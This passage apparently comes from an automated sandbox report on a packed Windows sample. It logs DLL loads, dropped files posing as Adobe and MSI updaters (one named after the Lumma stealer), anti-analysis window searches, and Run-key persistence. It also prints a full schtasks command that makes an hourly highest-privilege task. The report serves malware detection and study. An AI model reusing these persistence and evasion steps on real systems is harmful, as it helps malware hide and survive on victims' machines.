                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 2q45IEa3Ee.exe Static file information: File size 2551616 > 1048576
                  Source: 2q45IEa3Ee.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x15fc00
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdbT2n2 `2_CorExeMainmscoree.dll source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdbP@n@ `@_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb,ANA @A_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdb source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: lumma1504[1].exe.0.dr Static PE information: 0x8AD735A1 [Sun Oct 25 04:22:57 2043 UTC]
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Code function: 0_2_00D3B380 LoadLibraryA,GetProcAddress, 0_2_00D3B380
                  Source: initial sample Static PE information: section where entry point is pointing to: .boot
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .themida
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .boot
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push 58490A72h; mov dword ptr [esp], edx0_2_011C1C56
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push edi; mov dword ptr [esp], 000AA9A0h0_2_011C1CCA
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push 7B7C085Ch; mov dword ptr [esp], ebx0_2_011C1CE6
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push ebx; mov dword ptr [esp], edx0_2_011C1CF9
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push edx; mov dword ptr [esp], 55DBEDB5h0_2_011C1D7E
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push edi; mov dword ptr [esp], 37DA81A0h0_2_011CF3CF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ebp; mov dword ptr [esp], esi0_2_011CF3FF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ebx; mov dword ptr [esp], edx0_2_011CF43D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push eax; mov dword ptr [esp], esi0_2_011CF4B2
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ecx; mov dword ptr [esp], esi0_2_011CF519
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push 485CE8D9h; mov dword ptr [esp], ecx0_2_011D3C1E
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push 72D11309h; mov dword ptr [esp], esi0_2_011D3C3B
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push edx; mov dword ptr [esp], ebx0_2_011D3C51
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push edi; mov dword ptr [esp], 6664B914h0_2_011D3C7D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push ebp; mov dword ptr [esp], edx0_2_011D3D1C
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push edx; mov dword ptr [esp], ebp0_2_011D3210
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push ebx; mov dword ptr [esp], ebp0_2_011D3254
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push 5A0126E9h; mov dword ptr [esp], edi0_2_011D328C
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push edi; mov dword ptr [esp], ecx0_2_011C41C7
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push edi; mov dword ptr [esp], ecx0_2_011C4216
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push esi; mov dword ptr [esp], 3BD107AEh0_2_011C428F
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push eax; mov dword ptr [esp], ebx0_2_011C42B7
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push eax; mov dword ptr [esp], 4AAA72D6h0_2_011C42BB
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push ecx; mov dword ptr [esp], ebx0_2_011C42EF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push edx; mov dword ptr [esp], edi0_2_011D5191
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push 5B1B3B8Ah; mov dword ptr [esp], ecx0_2_011D5199
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push ebp; mov dword ptr [esp], ecx0_2_011D51AA
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push edx; mov dword ptr [esp], 000AABB0h0_2_011D51E8
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push eax; mov dword ptr [esp], ecx0_2_011D5265
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push ebp; mov dword ptr [esp], ecx0_2_011D5269
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE39FC push ebx; mov dword ptr [esp], edx0_2_011CA92F
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: entropy: 7.999554529460661
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .boot entropy: 7.949677127496007
                  Source: lumma1504[1].exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: AdobeUpdaterV202.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: MSIUpdaterV202.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: RegmonClass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
